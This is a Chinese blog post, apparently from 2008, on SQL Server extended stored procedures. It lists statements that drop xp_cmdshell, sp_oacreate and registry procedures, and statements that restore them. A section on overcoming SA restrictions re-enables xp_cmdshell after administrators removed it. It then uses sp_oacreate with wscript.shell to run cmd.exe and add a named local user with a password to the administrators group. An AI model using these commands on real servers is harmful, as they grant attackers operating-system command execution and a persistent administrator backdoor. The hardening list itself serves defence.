sql危险存储过程

于 2008-08-19 08:43:00 发布
阅读量251 收藏
点赞数
本文介绍如何在SQL Server 2005中管理危险的存储过程,包括开启和关闭xp_cmdshell等敏感功能的方法,以及如何通过不同步骤恢复这些存储过程,确保系统的安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

如果不删除sql危险存储?

如果不删除sql危险存储,可以按下面的方法执行系统命令

sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

SQL2005开启'OPENROWSET'支持的方法:

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

SQL2005开启'sp_oacreate'支持的方法:

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

突破SA的各种困难

常见情况恢复执行xp_cmdshell
1 未能找到存储过程'master..xpcmdshell'.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕
四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user dell huxifeng007 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators dell /add'

xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user dell huxifeng007 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators dell /add'

--------------
xp_cmdshell新的恢复办法
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复,不用去管sp_addextendedproc是不是存在

-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:/winnt/system32/xplog70.dll'

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell
----------------
删除sql危险存储:

DROP PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
DROP PROCEDURE sp_addextendedproc

/*不狐 附上恢复扩展存储过程的办法

先恢复sp_addextendedproc,语句如下:

SQL代码
  1. createproceduresp_addextendedproc---1996/08/3020:13
  2. @functnamenvarchar(517),/*(owner.)nameoffunctiontocall*/@dllnamevarchar(255)/*nameofDLLcontainingfunction*/as
  3. setimplicit_transactionsoff
  4. if@@trancount>0
  5. begin
  6. raiserror(15002,-1,-1,'sp_addextendedproc')
  7. return(1)
  8. end
  9. dbccaddextendedproc(@functname,@dllname)
  10. return(0)--sp_addextendedproc
  11. GO

再恢复以上所有扩展存储过程

SQL代码
  1. usemaster
  2. execsp_addextendedprocxp_cmdshell,'xp_cmdshell.dll'
  3. execsp_addextendedprocxp_dirtree,'xpstar.dll'
  4. execsp_addextendedprocxp_enumgroups,'xplog70.dll'
  5. execsp_addextendedprocxp_fixeddrives,'xpstar.dll'
  6. execsp_addextendedprocxp_loginconfig,'xplog70.dll'
  7. execsp_addextendedprocxp_enumerrorlogs,'xpstar.dll'
  8. execsp_addextendedprocxp_getfiledetails,'xpstar.dll'
  9. execsp_addextendedprocsp_OACreate,'odsole70.dll'
  10. execsp_addextendedprocsp_OADestroy,'odsole70.dll'
  11. execsp_addextendedprocsp_OAGetErrorInfo,'odsole70.dll'
  12. execsp_addextendedprocsp_OAGetProperty,'odsole70.dll'
  13. execsp_addextendedprocsp_OAMethod,'odsole70.dll'
  14. execsp_addextendedprocsp_OASetProperty,'odsole70.dll'
  15. execsp_addextendedprocsp_OAStop,'odsole70.dll'
  16. execsp_addextendedprocxp_regaddmultistring,'xpstar.dll'
  17. execsp_addextendedprocxp_regdeletekey,'xpstar.dll'
  18. execsp_addextendedprocxp_regdeletevalue,'xpstar.dll'
  19. execsp_addextendedprocxp_regenumvalues,'xpstar.dll'
  20. execsp_addextendedprocxp_regread,'xpstar.dll'
  21. execsp_addextendedprocxp_regremovemultistring,'xpstar.dll'
  22. execsp_addextendedprocxp_regwrite,'xpstar.dll'
  23. execsp_addextendedprocxp_availablemedia,'xpstar.dll'
iteye_10992
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值